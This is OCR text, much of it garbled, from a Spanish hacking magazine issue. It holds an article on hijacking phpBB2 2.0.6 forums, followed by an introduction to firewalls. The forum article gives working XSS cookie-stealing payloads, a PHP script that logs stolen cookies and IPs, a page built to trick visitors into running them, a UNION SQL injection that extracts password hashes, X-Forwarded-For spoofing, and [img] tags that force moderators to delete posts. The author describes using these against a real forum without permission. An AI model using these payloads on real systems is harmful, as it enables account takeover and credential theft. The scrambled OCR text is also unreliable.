Co : ee ae,Director de la Publicacién EDITOTRANS S.L. J. Sentis MAL: B43675701 Gime MONTEL WO 20, 2°- 1° E-mail contacto sie TRRRAGONA (ESPANA) director@hackxcrack.com Disefio grafico: J.M. Velasco E-mail contacto: grafico@hackxcrack.com Redactores AZIMUT, ROTEADO, FASTIC, MORDEA FAUST, ENTROPIC, MEIDOR, HASHIMUIRA, BACKBONE, ZORTEMIUS, AK22, DORKAN, KMORK, MAILA, TITINA, SIMPSIM... ... .. | Contacto redactores redactores@hackxcrack.com Colaboradores Mas de 130 personas: de Espafia, de Brasil, de Argentina, de Francia, de Alemania, de Japén y algun Estadounidense. E-mail contacto colaboradores@hackxcrack.com Imprime. ,G. PRINTONE S.A. Tel 91 808 50 15 DISTRIBUCION: ata Rebeka SEL. Avda, Valdeparra 29 (Pol, Ind.) 28018" ALCOBENDAS {( alls Tel 91 657 69 00 FAX st 657 69 28 tack x Crack WEB: www.sgel.es © DE ANI > TELEFONO DE ATENCION AL CLIENTE: 977 22 45 80 E DE ANUNCIANTES Peiion de Nimorosarasodo y Sunrpclnes (ra. Canovevs) HORARIO DE ATENCION: DE 9:30 A 13:30 eS HORARIO DE ATENCION: mea o (LUNES A VIERNES) DOMETECA 23 © foe ht Editotrans S.L. AOSTALIA 2 22 — aa IN SPAIN BERIOCIDAD ee Deposito eg B 26805 2002 Codigo EA! 8414090202756Este articule te perimte tomar el control total de cualquer foro de Internet hasado en PUPDO2 en sa versiin 2.0.6 Nuestra mloncsin oc la de sempre: ENSEANR. El conecrmento hes hace hres, ne profanesjamas tu mente con actos que te desmerazcan Hola, de nuevo... vamos 9 realizar un (ncisa en el curso de segoridad y firewalls para tomar un tema interesante. delicado y que se que nova a caer en $300 roto.... sudores me entron cuando recuerde alguna tarde pensande en Jo que nos pude haber ocurrict.... Este articulo persigue un objetivo final Entrar a un foro come administrador, como moderador o como cualquier ‘acre usuaria, Para ello vay a describir varias téenicas, mediante enlaces malicieces en un post, creando una pagina web “misteriosa™ qué nos dara los pardmetros necessrics, utilizando técricas de spoofing mediante proxys, manipular las cabeceras de http "a io bestia", obtener el hash de cualquier usuaria y crequeandola por fuerza brute, ychmo no... inyectando HTML y SQL. Todas elas tienen algo en comin, utilizar un bug ¢ varios bugs que han ide descubriindese pare feros phpBa2, concratamente para las versiones 2.0.6 que era la de nuestro fora ® Qué 8 un for, adventencing y derviennes de practical Sires a uses lecto’ y no wabes macho Uvtesmot, guia ie Pagina 4 Rogues que es wir Four Ua Geuype ye wuss Guo TH yaa auf que nicole por HE WAHAGiATNGR com y enna ea st these Losfimis on, hor por hey. une de-lasterrireamias naa ublizadas donde personas coms til ¢ ¥o cumpardmey wdy tiny de ‘conesimienos y experieneias- Ls mayoria ds cormanidades Hen al sys y ef ef punto de revmion de eye miembroe ‘Aubgu hey Un Servidor Web que permita ejecutar scripts php © Conocer un paquito.. MySQL > ¥ el presente artiulo.. muy poquite de ‘Yams a empezar la casa por el telado.. yamos 8 emperar “deseubriendo" une Po PASO IA PASO N22 ger yulngrabilidades que nos permitiran: & Obligar aun administrador 0 moderador de un foro vulnerable 4 climinar une, ‘varios 6 tados los pest de "su foro’, sin saberlo y sn darse cuenta © Obtener el hast ce la contiasefla de cualquiera que entre en el foro y tenga verificada la casilla de “entrar sutomdticaments an cada visita” » Obtener el SiD de usuario y-el JD de usuario y haste ta IP... y mas cositas... Luego, ussremos una pagina web para Sautematizar” toda eso ¥ *despreocuparnos” Después... usaremos SQL injection para realizar Io mismo y #trp spoofing paras © Averiguer la {P, el SID, la contrasefia y lo que nos de la gana de cualquier usuario > Seremos capaces de postear con IP falsa, hasta con IP's que na existen @ ¥ por Gitime: bCombinaremos todo Ia dicho anterormente y entraremos al fare como otra usuario, usande su 1 nick, na sera preciso saber su cla acogon, pero conseguireris beue lo dicho ver sus mensajes privados, postear en su nombre ys! sc trata de un administrador tendremos accese ala Joya de la corona en un foro... el panel de administracién. } También, y dicho see de paso, podrentos saltarnos los faneos (si fuimos excluidos) por IP, par nick... dor la que nos de la real gana... y mas... hasta pademed... me calle. PagrasAsaltando foros - Asaltande foros - Asaltando fores - Asal Pagina § con este asunto. For ello sera (replta que notenemos autorzacién a “precocar” ideo! foro. ube Bu Es cierto qu: en este articulo hay casos reales, unos contra nuestros foros quando eran wulnerabies y otros contra... bueno, ya lo vers encontraras qué este modeste servidor entrd a un foro “guirt camo moderador del mismo sin serla.... usurpande la identidad del verdadero moderata, Mientras eseribo este articulo envie un mensaje privads a los moderadores de exe foro (por cierto, aunque este articulo sale ahora, se escribio en Mayo auaque uve que repetir/as practicas para obtener Jas pantallas can calidad suficiente) asi qué espero que hayan tomado las medicas corraspondiontes. al finalizar el articule Vamos a empezar. Alla por finales de diciembre de 2003 administradores y moderadores del fore con un tug que en su dia me parece "significative", corsiste alerté a los en inyectsr eédigo, una simple inyeecian de un Java Script, el cansabide Cross Site Scripting vulnerability Mae informacién sobre el mismd lo puedes obtener en: http://www. securityfocus.com/bid/9290 a = de ju dip epic aar esta in| le ones a aceite Vamos a “comproderio” con nuestros: Toros. sredares de Prachas ho hacker Cran ye deberdam cia creme ros he ge para gue practioner “ren naekecrark. com ‘Pern canando as ceras Hnean, lee Primero ans fagueamos con nuestro nick y password y NO verfficaros ta casilia de Entrar zutomsticamente on cada visitas. POPASG APASU NeatUna vee validades en el foro, accedemas Bien, ahora pinchamos en el link que 2 cualquier subforo y nos dispanermas a agabamos de poner... y pasard esto; publitar un tema....0 responder Un post oun privado... cualquier sitio que nos deje postear alco. Yen el cuerpa del mensaje posteanos esto: Recibimos en nuestro navegador el hitp:/hwww hacocrack.cam/phpBB2/p resgultade de! script inyectado fivmsg. php?m: >< script>alert alertidocument.cookie} {document cookie); fe todo ese nos fijamos en to que aparece redeade con circules rojos... El sid, ol auroleginid y cl userid. Gui O- RED pee Hoe re Ei sid cambiara por cada conexion rusva que efectuernos con el fora, de momento no nos serd de mucha ayuda, pero luego serd Imprescindibte... Elid, os 1011, 8 el numero de usuario que me corresponde... cada une tenemos. un valor constante y que se nos adjudica euands nes regiztramas por primers vez El autologinid, guardard el hash de le contrasefia en MDS, siempre ¥ cuando Yen lugar de publicarla le damosa la el usuario haya iniclado su sesién vista prelimingr.. para no larla @ verlficanda Ia casilla de entrada automatica, ro es nuestro caso, asi IS qué... 9 nes Seivind ¢e mucho, 31 husiese Gees 02 Bt: enem iciare pam entrado con la casilla verificada, veria 23 ily nant ah moat i esto; Ess des ofreulos verdes encierran ia cadena MDS cel hash de mi contrasefia, que para este casa est {9984570 20dBSF1 1 78139 764DB19C8 sinus la Mevamos @ en cracker de MDS sacarends la cortrasefa, (quands explique fodo, veremos como se craquear....} PCPASOAPASON 22 Pagina 7Fagina 8 Claro, que esto sélo seré asi si el usuario entro con la casilla verificada.., y ademas... esto se envia @ nuestro propio navegador, lo que seria interesante es que nos enviase la cookie a un servidor web y que la podarnos recibir, ya sea la nuestra o la de otro usuarld, buena, por el momento nos quedamos con “e/ cencepte’ De Io que se trata hore es que tras publicar un post “de verdac nos envie la8 cankies de tode quisqui que se pase por el hilo... ¥ de oreparar un Servidor web que reciba las cookies, 19s sid y todo sso... y daro. seca” su 1P, con esos datos estaremos en condiciones de conectaraos al foro como si fuésemos el verdadero usuario, varros a construir esa web... también tandremoas que Primero ros mantamos Auestre servider, Apache. iS, & que nos de le gana; pero hay que instaarlo con soporte a php, puesta que vamos 8 usar un pequelic script para que almacene en nuestro beaserver las cookies de los que nos van leyenda el post Obvismente hay que publicar un past en cualquier Foro “animando” e wisitar esa web, nada difiell, un inofensivo link a una web “aparentemente” estupenda... 9 de e505 coses que vemos por ios foros Je "esta es mi web espere vuestros comentarias....", hasta puede serun link “dirigido”... wego veremas mas... de moment lo simple, El asunte es e6mo pasar la cookie a un webserver, ro es tarea facil, no creis... hay un problema: el 922 det Fink, que no es otra cosa que la nyeccién HTML pata él script privmsg, pip, equivale a las comillas dohies (*) ysl en ese script ponemos cualquier cosa que leve comillas simples a debles, deja de funcioner, ¥ no valen Jas formas \“ ni nacia de eso... es una lata... Anil, ¥ si queréss probar también furciana con viewtope.php, editprafile.ahp, etc. Asi que nos creammos una wed én un sitio cualquiera (vo me Jo creo en mt propio webserver, pero jo puades subir > cualquier site que soporte php y eirule igual de bien), €| cGdigo Aun de esa web es el que sigue y el archivo lo lame smiramiweb.html eas a A su vez llama a otra archive cuyo nombre 65 obrariweb2.nemrt PC PASO A FASO WY 22‘Asaltando foros - Asaltando foros - Asaltando Quando se cierra la pagina principal, se ejecute un seript php de nombre roba_cookie.php y su cédiga es: es eee fete Kalki) Purmeto Yer Anda. = gobal SREMOTE_ADDR; Senmicia_rubval $_REQUERTIa cookie); Sipu=$_SERVER[REMOTE_ADDR'}, Siewokies=fopen("eaptaracet” at); fwritefconkies, “einIP: it"); Fwrite(Sfcoukies, "Sipu \riwhrat forite(BMcockies, “cookie de HxC; ey fwrite(Gfcookies, “Scoolie_vobada Wiilrin"); floco(Sfeosldost » Buena, cxpliguemes un poquita el cédigo.., para los despistados y para ponemos en situacién: El Archive miramiweb. html Es la pagina principal incuye una funcién denominaca fuas, que invoce al método over cuando se [a lars y sjecuta d Script reba_coakie.php pasdndole come parametro el contenido que exista en al objeto window.status... cuando veamos Un €a50 précti¢o Se entenderd mejor. Utilize dos iframes, uno que “se ve" que Ic llamé f#2, y otra que "no se ve Y que to lame fr Ef iframe fr2 carge el contenido de la pagina miramiweb2.htmd (que es lo que veremos cuanda se llame a la pagina peincipaly PASO A PASO NP 22. Ei frame fri carga et contenida de una pagina del foro junta con le Inyeccién HTML que utilize ef bu9, y la cookie, en lugar de mostraria con un alertidecemen.coalée) se pasa a la barra de estado del navegador, window.status =docuument.coakie. Par iiltima existe un form |lamado Escribe_fo, que se lanzara mmediatammente después de cerrar ta ventanita de ta web malicioss y ademas hace ia lsmada a la function juas( que come ditimas antes le pasard el contenide de window.status (cue ya tendrs la cookie} al seript roba_cookie.php, Esto ec impertante que cox axl, bueno hay otras formas, pero elegi esta. El caso 25 que como tarderé unos segundos en cargar fa pagina del fora, 5| Intentamos pasar la cookie antes de que lo haga, no la cazaremos, pareso se ejecuta con el metodo onuniead y por eso en la web meliciosa hay wideos, fotos, ete... hay que dar tiempo @ que se cargue la pagina del foro dentra del iframe fr te recuerdo que nu lo verds porque tiene un tamario de 0 x 0) ELarchive miramiweb2.htm! Este no tiene ningan misteria, simplemente vsualiza una foto y muestra an link para ver "los mejores videos del mundo’. el contenide de este archive se mostraré en el rane f2 PaginaAsaltando foros - Asaltando foros - Asaltando foros El are 0 video.html Menos misterio ain... es eso... un simple video... Elare roba_cookie.php ES un serge php que aratara un archiva de texto con la P del personaje que visita nuestra web y la cookie que le pasd la funcién jaas() en el archiva miramiveb.ttmt. Guserva que se pasa como parémetra window.status la variable la_cookle: es quien almacenara @| contenido de window.status que se recibié coma parametro, La variable Apu: es la IP del que nos visita y se recege de la cabecera X-Forwarded-For. Bueno, pues vamos a ver come funciona toda y Ip damas per zanjada Primera, posteamos en un foro “ei reclame’ para que visiten nuestra web... Cuando Jos usuarios que pinchen en el enlace del post, les anareceré otra ventanita en el navegador... esta Como ves (todeade on rejo) sa musstra Is cookie en la barra de estade (window, status) ta\ y como te explicamos en el éframe fr2. Nuestros visitantes risitan nuestra web, pasean per los enlaces... aistruran con los videos... etc... mientras tanto én ¢! iframe frz ya se ca°g6_ por campleto el script con la inyeecion HTML, ahcen se ve... en la barra de estads, per eso decia yo lode hacerlo "mas discrete”, pers €80.,. e500 05 Un ejempic... Cuando nuestro/s visitantes cerren esa ventana 0 “safgan" de nuestra web, sc invacard el método onuntead, se ejecutard (a funcién juas{) y se ltemars al script roba_cookie.pha. En el sevider web pasd esto: i 7 $e creé un erchivo llamado captura.txt tal y como debla realizar nuestro programa en php. PC PASO APASO Ne Zz{QUIERES COLABORAR CON PC PASO A PASO? PC PASO A PASO busca personas que posean conocimientos de informatica y deseen publicar sus trahiajos, SABEMOS que muchas personas (quizas tu eres una de ells) han creado textos y cursos para “consumo propio” o “de unos pocos’, SABEMOS que muchas personas tienen inquiatudes periodisticas pero nunca se han atrevide a presentar sus trabajos a una editorial, SABEMOS que hay verdaderas “obras de arte” creadas por personas como tuo yo y que nunca veran la luz, PC PASO A PASO desea contactar contigo! NOSOTROS PODEMOS PUBLICAR TU OBRAU! SI DESEAS MAS INFORMACION, envianos un mail a empleodeditotrans.com y te responderemes concretande nuestra oferta,Asaltando foros - Asaltando foros - Asaitando bet rn hee or php enero AL Pagina 12 Hi vered ol contenido de cee archive... Ahora tenemos las cooties de les tres “imecentes" que visitaron la web... les dos primeros usaron |= entrada eutamadtica, por tonto abtenernas les hashes (lo que vienctras autologinid....} de les contrasefias y sdla hace falta basarias por e! crakeador que mas rable ngs oe... Por elempla Cain... htto://mww.oxid it y ya... Hehemas que para uno de Ws usuarios & password es mitesoroentxc y para el otro es kusli2 Abhh, que ne sabes ef nick... venga homibre...acredes al foro, come usuario 0 como invitada, y escribes esto, en el tasa del user 1021 (ese numero correspond al userid’ que nos suministré la eooxie} Va le sabes... asi con les demas Pero... cy qué paso con ef tercero? De ese no tenemos ef hash... 0 sea que no podemos... JA, eso es lo que Ie dijo el lobo @ los tres: Gercitas,.. CLARO QUE PODEMOS, pero antes le explicar imo, necesito explicar “des. fonterias” acerca de camo falsear ta IP en un foro... huene y¥ ea mds sitios, pere Io que ros afecta en este cado es un fore, Varvos a necesitar dos cosas... Achilles 2 proxomitron httpr/ /packetstocrasecurity.i/ web /achilles-0-27.zh ttpid / www prexomitren into /Mas/ dewmnioad ProxNasy. ace Yel parche a espafial en: {ex Pmgty etaens/ c ge roncontnen/ NE Lo haremos con Proxomitran,.. 36 automatiza mds la tarea, aunque si queremes “obserrar” paso & paso todo lo que ocurre, esti bien la de Achilies, pere te harkaias de modificer un paquete de datos tras otro... Esto es muy facil de instalar. descomprimes él .2ip en un directoria, despuds descargas la traducsién « capaho! y sustituyes el archive ejecutable del directorio en el que Io instalaste por +! de la versin en espafiol, yo lo tenge en la carpets D:\proxo i hee ee Ga a. 43 PG PASO A PASE IP 22Asaitando foros - Asaltando foros - Asaltando foros - Asaltando foros = Asaltands foros Lanzamos 4 ejecutatle yen ia barra de tareas o en la bandeja del sistema aparecerd su icano... pinchamos dos veces sabre él ¢ botén derecho y abrir Proxomitron Aber Proxomitron Fibres de Pig Web, 1 Fibres de Freabazadoe Subartae (ibrce da Ercabaadoe Enters ‘Congeiae Armsciones Git Dopey Pacar User Prony Remoto Ais Verto de Hoe Cong bechvo de conPgrect ‘Mods ol Daucedor de Archives _dterfloaueodr de ctivas Alabrirse, desmarcaremos todas las opciones excepto la de encabezados sallantac: Pinchamas en Configurar y en la ficha HTTP FG PASOAPASD Ne 22 Hegines el puerte (uno que no esté en uso, a mi me dia par e 8000) » aumientames ef tiempa de coneaiones locales a 3600 seguneas (una horn} Aceptamos y volveremos a la pentalle en la que empezamas. Ahora Pincharemos en Encabezados I eer digart Metecape BEDE foe) Fo User geet Metco Line ou] EES Usher Netrnna a Ek tne Bajemos hasta el final con la barra de deslizamiento que hay 2 le derecha en la zona blenca y verificames X- Forwarded-For (out), sélo de salida, le damos a editar y en el recuadra que pone Reemplazar por este Texta panemos 1.1.1.1. Pagina 13Asaltando foros - Asaltando tores - Asaltando foros -Aseltanda foros - Asaitande foros FOS. En Tes miimiererd euteviowes evista 6 hak pudicada roche foreias de falsear ta LP esta se ofa mds @ Voy & poneres ura canture dé pantalla del panel do adminictracidn del foro, en el que Se ven las IP's de los usuarios que hay conectadas.., Aceptamos, Aplicamos, Aceptamos y cerramos la ventanita del Prexomitron si queremcs... 01a dejamos tal cval, como prefieras Ahora configuramos nuestro navegador para que las conexiones sallentes pasen por el proxomitron....y Ie Indicamos que usaremas un proxy eon TP 127.0.0.1 sor 51D; ManGeaS7eaGosGbatecddGe Bege2der (que es lo que ros do el sq! inyection de las tables session y que varia nor cada ver que se loguea.o sea. que hay que hacerfa "en ef momento que se le reo..." Pues ahora solo nos falta completar ta cookie y ponerla en él praxontitran como aprendimos.... 8 esto le pegamos @ SID ohtenida y le cambiamos el userid Por ultima ponemos fa IP en ta cabecera X-ForWarded-For (out) y elresta ya lo conacemas ® Te astards preguntardo si se pueden hacer ms cosas... pues si... por ejemplo podemes sacar el haatde la contraseiia y luego craquearla, aungue caro, despues de esto no tiene mucho sentido perder tanto el tiempo, pera en fin, te mandrel cédiga de inyeccidn: ttn: //vww hackxcrack.com/phpBE2/er ivmsq.php ?folder=sareboxamodesread &p=998pm 2a) ussr-ANDM2Opm. priv ms 5 t ee 99002 UNION Se205ELEC Mp auusernam @user_password, user password,user_p assword,user_possword user password wider possi sEwordwuser ssword.user passworduser, Te USEr password user_passworduser pe ssword.user_password,user password, user_password,user_password,user_p3 senord user reser naseul us2r_password,iser pascword,user_pa sorurd.usel_pessward user password, user_password user password.user pa ssword,user_password,user_password g20FROM% 20 nnobh2 users420WHER E95 20username="Grullanotx' 20M e20L/* Con este no te hace falta ni conocer el userid... directameate ¢| nombre dei usuarlo'y ZAS, el Rash en MDS cel usyario en tu navegadar... luego al crack... ara BR er tres ma Por si quede alguna éuda, aqui'te panga algunas capturas de “stro” fora, para que no haya susceptibilidedes, por si piensas PG PASO APASO NP 22Asaltando foros - Asaltando foros - Asaltando foros: que siendo uno de los administradores de hackoxcrack tengo més pasibiidades... Entrando en ef foro “guiri*, “curiosamente” él usuarto usurpade era un moderacer ® Viendo Ja zona reservadz para moderadores y administradores PG PASO A PASO N° 22 Moderando el fora... bai lea Tedo usando la misma técnica... clara, que para que puedas usar las inyecciones SQL y averiguar fas pardmetros necesarios pare el Spoor, primero hay que registrarse.. puesto que pare usar los eddigos anteriores hay que haber hechs fogin en el ferv.... eno Ser... que s@ permita gostear a los invitados. Terminando.... Si cambias la IP del X-Ferwarded-For ef el proxomitron y estis losucado en el foro... te desconectaras solito, porque el phpBB2 comprobars gue tu IP ye no es la misma y caduearé tu sesidn Pera utilizar SQL inyection y HTME inyection debes estar togueado como usuario registrado, no sive como invitado. Para spoofear un usuario con su IP yel SID robada, debes hacerla come invitade y en una sesién nueva de! navegador, en caso contrario ne funcionard Pagna 21Asaltando tors - Asaltando fores - Asaktando foros Craquear los hashes en NGS de tas contrasefias. pede ser una labor eterna... si el usuano tiene un password de muchas caracteres y con combinaciones de letras, numeros ¥ signas, Io mas probable es. que nos entierren a todas antes de sacaria, Abhi! y decias que se pueden borrar DOStS © “Whig!” a eflaces maliciosos... Bues si... este €5 otre bud, de lo mas estiaido, pero sorprendentemente day Si ponenn B nttpo//www-hackxcrack com/phpBB2,/10 in.chp?leqout=tr y pinchamos en el link... nos dasvorectal., vasalece, eso es una gilipofer.. nadie pinchard en est... pero... dy Si poremes esto7: [img ]hetp:/ /www. hsekxerack.com /phpBB2/login.php?logout=truel / mg] Pues parece fo mismo, perana lo es... 21 phpBB2 ce hace ts picha ur lia y quiere mostrar esa imagen... no puede porque flo (0 es... ¥ fo ejecuta... 0 sea, que 5! Ronemos e56 como firma a coma avatar... todos los que vean los post del usuario que tiene eso en su firma se desconectaran del taro, Pues para berrar post igual... ¥ cuando un administrador o un moderader pase por ese hilo, borraré el post que s@ haya indicado.. PREGUNTAS. STN Los usuerios narmales na pueden borrar en la mayor parte de las ocasiones, pero si me pongo ¢so en la firma... sequro que un administrador 0 moderadar, tarde 0 temprane vers algune de mis posts y se borraré el que yo quiera.. Pues la respuesta la di en el hilo de "ta importancia de lamarse HTML", mas iframes © Es decir, me creo una web en cualguler servidor..... ¥ junto con mi bonta web, sus fotos, videos, ete... me creo esto: Yr na siga par que ya la cogdic, ina? © mds faci un JavaScript y un bucle que vaya vanianoo e valor ge p Pero hay mas... usar estos también se pueden ond nurmero sera la palabra cersurada a borar PC PASO A. PASO RN? 22Asaltando foros - Asaltando foros - Asaltando foros - Asaliando foros - Aseltando foros Fatah Peeion_ seniaoa, pap Pebinde =deieteald=admere, para Ios smilies Tadninjadmin_user_benpho *modeadeiteidananere para las baneados..., vamos, un desastre, de verds... a més de una le han fulminado 4 fora completo. Ahore sf y un agradecimiento especial © termina: dos cosas, otra enlace El enlace es para que os poddis descargar tados las cédigos expuestas, las webs malicoaas, los html inyection y sal inyection, que teclearlos es un ralla + segura que nos equivecamas. Eso si... cuidadita con lo que se hace... ntsperiwoneforahse.conmhuarrositescarca. zo ‘el agradecimienta Agradecer la labor que mis compatieros han realizado, labores de vigilancia Intensiva para que esto no ros ocurriera ‘3 nosatros, para todos jos moderadares que san hoy, los que fueron... ¥ para un grupo “de oteadores” ¥ “conetiios de Indias” que nas ayudaron a mantener ‘el orden", moebius, Yorkshire, mi querida y ultrajade Grullanetx. dejarme a ningunc,,. pero tados sabis aquicnes me refiero.. GRACIAS!!! «. buff, expera no Tu propio dominio por sdlo 18,95 € por un aio’, con todo incluido: Wa incluido “com Panel de control fet + Redireccién a tu pagina WEB con META-TAGS .org—* Redirecctén de email info. > Gestion completa de ONS: opunte o tide tu euneain + Blaques antirrobe * Sin tetra pequora: 18.95 1WA Inc (15.34 +A T6X}. PretD para un ao de registre extersiones com, met, org. crf, bie Fredes tecubes Canktaionas ‘aries ahca. biz domiteca www. domiteca.com Precias especiales pata étibuidares, conavitano, DOWITEC Act es un servicie afrecido por HOSTALIA TERNET $.L.24 Incamos un nuevo curso de le mas jugosu” No hace falta hacer una extensa presentacon. snplemente telo advertimos: NO ES UN CURSO QUE PUERAS SALTART EM a a ee Saludos de nuevo, amigo@s Nuestro sguierte objetiva son las cortafueces, os Firewrasts, e505 "wustres” cancidas y descanocidos. Par | momento presentare algunas definiciones bésicas, tipos ce cortafuedos, su imolementaciéa, algunos servicios caracterlsticos como WAT y PAT y terminaremas e! preseme articula con Ios acceses HO aukorizedos a redtes, Pare después de las vacaciones ge verano, tenemes una gran tera, cenartidas en vatios Artieulos més: implementareios Firewalls Comercialas, otros come IOTABLES y continuremes con algunas articulos interesartes 4 partir de Octubre como © nader Hetchvadneas © Integracién de Sistemas LINUX-Witdows ® Diseriv y Temiologas de Races Prvadas Virtuales » Redes WAN: ADSL, RTB, RDSI... & Routors y Routine Y terminaremas ail4 pare final de afo Gunsirtiende nuestre PC (uno viejecito, no hace falte que sea una sipermdguina) en un ROvter ADSL tanto para Windows como pata COVEN, nada tendrd que eavidier & esos “aacnarras® del tine CISCO. 3COM Zyxel, ete, Haste ofteceremos conectividad en diferentes tecnolagias de redes, fibra, ethemet; token y por su puesto... INTERNET, fasta puede sex fa tan viipendtada XBOX que tants disgustos y alegrias aos causd., eCorvertirla XLox en un souter ADSL? Mirm, 5 une idee... a fin de cuentas vene une entrada ethernet y una conexién @ Internet... ¥ qué cemontes... es um Pan discodura y reno Por el momento nos conformaros can ta que hay... unas cuantes PC's y los medias y dispositives de red habituales, pero afrontaremos este heche can los conocimientes necesaras peta consiruir un sistema eficaz Je seguridad, Tras "fa sere” ce 10S (puthieace en los anteriores minerar dle la revvtsta), shore hablarerics de Firewalts, proxys, gatoways y host bactién. Derinicién y funciones de un Firewall La funelin priveipe! de un Finewall coosiste @n examinar las comunieationes que se galablecen entre das redes, permmnirias, rechazarlas @ Incluse rediriginas. Aunque se puede implamentar solucianes Firewalls en ana dinica ied, pa ax iv habitual. Lo-normal es que los Firewatls actien coma certinelas de guarcia evilende los eccesos no autorizadas 9 cualquier otro dispositive quer protege, que quede ser un tnico hast, unas, peces w lb red entera, Desue &! punts de sta empresarial, una ren guerda datos 2 Infarmaciin valiosa, por ello se debe guardar lg confidencialidad de sus detas, la inkegridad de los mismos y la disponibiidad jel eceso) der las maquinas que le componen Un Firewall ox (in dlepesitive (9 un comune de ellos} cle contencién, Funciana aividiendo fa red en vanes ronas y cyitande que el ixafico gererado entre o salga de cada zona sepencienco de unas ragias establecias, FC PASO A PASOEn aste arlicula haremos raterencia a los Firowatte core un canyinta da une 9 wares Cispositivos que se encuentren entre redes Ge confisnza (cane puede ser une LAN] ¥ redes externas (coma puede ser Internet). Un Firewall puede ser un router, un PC un host especifico disehado para ello, una cembinaci6n dle toda lo anterior y también sin conjunte d& méquinas que operan para reservar la seguridad en fos accezco a |a red yy tis-malments se ubicer en los linites. oe 'a fed, Heenire del prionetio que se considera como “seguro”, topolayie de te En grincipio: parece bastante facil detinir te que es © permetra de a rec, sin embargo. conla opericde de las redes privadas virtuale, a weces, no es taree Facil. PC PASOAPASO Ne 22 Ventajas e inconve: Firewalls tes de los Sin un Firewalf, les nedes quedan expusstas con todos Sus dispositivus y canfiguracian de seguridedl, exdlecir, si esas dispositivas oftecen Servicios al exterior, la seguridad 2 tas trensmisiones dependeré del prapie sistema operadivo a sea el sarvicia frecido. Ss equines y de fo robust que Sin un Firewall, ta seguridad se hase totalmente en los fasts y cuanta mas grande sen In rod maz cempleje ser mantenar Is seguridad individual de cai ya sabes, Inuephy “acecha’, amagine ona empresa con 5 servigeres wee y un administrador parchernda 10 aguieros... seguro qua parce todas inuies uno & anode elles. ‘Cuasele ace muchas ustos gue te Ctons 9 wees, we la ccm de olgunae coras realmente iresuntes. Un deataen? ‘ek que la pereoris. clande xe sceak por primiere sep a ta lgoninis, poxsen ona youn "inasencie™ Cree ap am esse “ec Tul” is porbsto, 4H twa se ayia que sien ine lo gue le dizes, ei Esa “Inscenela" ce plenke-riprdaments 4 evita qie tas -eonseiresis uname, Les ordctsdares rue Sinton ‘Operative ea Tuiionar yee msrp est prgmndo [por pessobr, fs meros comptes ersares x a rata os elon fores anes danas sidocapnces de pgramatlos an biew-co-relas fumanios Pagna 25Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewells - Firewalls | 2A déode eremes Heese coe ita nota? Pues quesi tod Tues Dect Ine Freaalic ins exit, lacow ¥ cadn une ge ae clemenrow ghe Terman parts de usa red eevjan elementos invulnerable, ero ui srugeien sees my URE lem read... para sige I propio poten TCPAP ise iemertecciones, po ht tania, cualguier serents basais en e (pot ejemple Toreracth erases ests fmperuccimes que deben ser ‘arapidas” por el Sistoms Opcrativs de tame, sia aebita cs iinpeetsst. eswnce ev {ca Ia medida de le posille) ows inperfeociones srmwetdor cal TCP el Sots Operon yt aden gue sigue y tgue rogama pen ur sister aperariva dehe {bE rep taes aes que tanta Sobers ven he asa (CAGE reinumle, Gini mags eompieo mgs CAOTECS 9 ms ‘adidas de eeurkcadneststaens. eo muni fam perfect ste mistlonn exstirin Esto no quiere ¢ecle que a Usar un FireWwail podemes cescudar alas hosts, pero no-cabe dud que |a Inclusion de un Firewaff en la fed ayuda a proteveria frente eun error y la atencién del aéministrador se centrard en una Unica maquina y no en tedas.. Los puntes fuertes de un Firewall son: | ® Reforzar la politica de seguridad ® Resttingly cl auxce a service especiflcas > Son auciteres excelentes } Producen alortas y avecan ce los sucess: Las desventajes 0 punias débiles sen: } slo ofrecen proweocion ante to que esta uterizade, jajaja, esters sonrende.. qué perogrullada,,. mitaio asi: Imaging un Firewall que protege aun Servidar Web, opviamence debe permwitir & tranca hacia el. mismo a no cfrecemos servicio alguno, pero por lo geaeral no protegers les atagues o explotacion de wuinerabilidades det senidar web o contra {a aplicaciin en sf. HTML injection, buys. conacious, overflows.... ate. Pagina 26 > Reglas genernsas o demasiado permislvas » No pueden detener ataques st el trefica yo pasa por elles... otra perogrullaca. cero siel atadue se preduce “deste dentro” dl Firewall no funcioraré... bendito seas IDS de mi corazén > Pueden convertirse en un embudo dsmiruyendo la fiabildad, 21 readimiento cla Mexibilidad ce la red. | Con Firewall o cin él, tamaién bay que asegurar los hasts, este daria para mauuuchas prticulos, pere como pautas a seguir: ademas cuance se implementa un Firewalt es recomendable taribiéa: PO PASO APASON? 22Firewalls - Firewalls - Firewalls - Firewalls ~ efio de redes con Firewalls Este apartado bien merece otro articula espectico, de hecho io tended... en préximos moses, pers paral mements trax eancaptos y tres implementaciones: Zona Desmilitarizada La OMZ es una red completa que permite el efice entio Intsmat dents 9 fuers da 's Inuanet ¥ al mismo tiempo mantiene la seguridad en le prapie frurariet ES como s/ recioldor de una casa, Tos de fuera” viewer pert no pasaa ai saléa, 00% visitan, tos atendemes y fos despedimos. no usarde af ta cocina, nf at cuarto de batt. "Los de dentro” nueden atravesaria nara seit ela calle’ o permanecer em ef recibidor, ore sin compromater {as oiras dapencancior dela casa, una OMZ #5 corc un buffer entre Titernet ¥ puesta red 1a DMZ contiene serviaores y asposivos de comunicacines de capas 2 y 3 (snitches, routers, Fircowails...) Loy servideres estan conectades DENTRO a= bh DIMZ y pueden ser proxys, servideres d= acceso remota, VPN, correc, FTP. Fed Lora PC PASO A PASO Nr 22 Host Bastién Es un sistema que se utiliza camo “punta fuerte” y con caracteristicas de Firewall, en muchas ceasiones es quien se lleva “las bofetadas", oueite ser un PG, un neuter, Un Firewall A menudo el Rest bastion es un sistema que NO REENVIA drecciones IP arere Internat la Intranet, es decir, se puede acceder | mismo Gesde cualgutera we jas dos partes pero NUNGA las dos redes Intercambian datos directamente, Puert: la Normalmente es un router qua acta como Firewalls core router, opera con ‘ittras de paquete para blaquear tréfico IP, TCP, UDP Que no esté autorizada, tembién otros protocols pere casi siempm con regias "stmales* de puertas ¥ serwicton despreacupdndose del contenida del trévico en si mismo, cominmente a ere corjunte de regles se les denomina ACL's (Listas de acceso} Tedas estas definiciones, conceptos ¢ Impiementaciones en ocasiones pueden contunaute, sabre rodo en defies de red pequelins, en estos casos ries encontremas con un “toda €7 ano", Imagine una pequeiia ampreea con 20 6 40 mAquinar, eon una conexién ADSL conbratada con un proveedor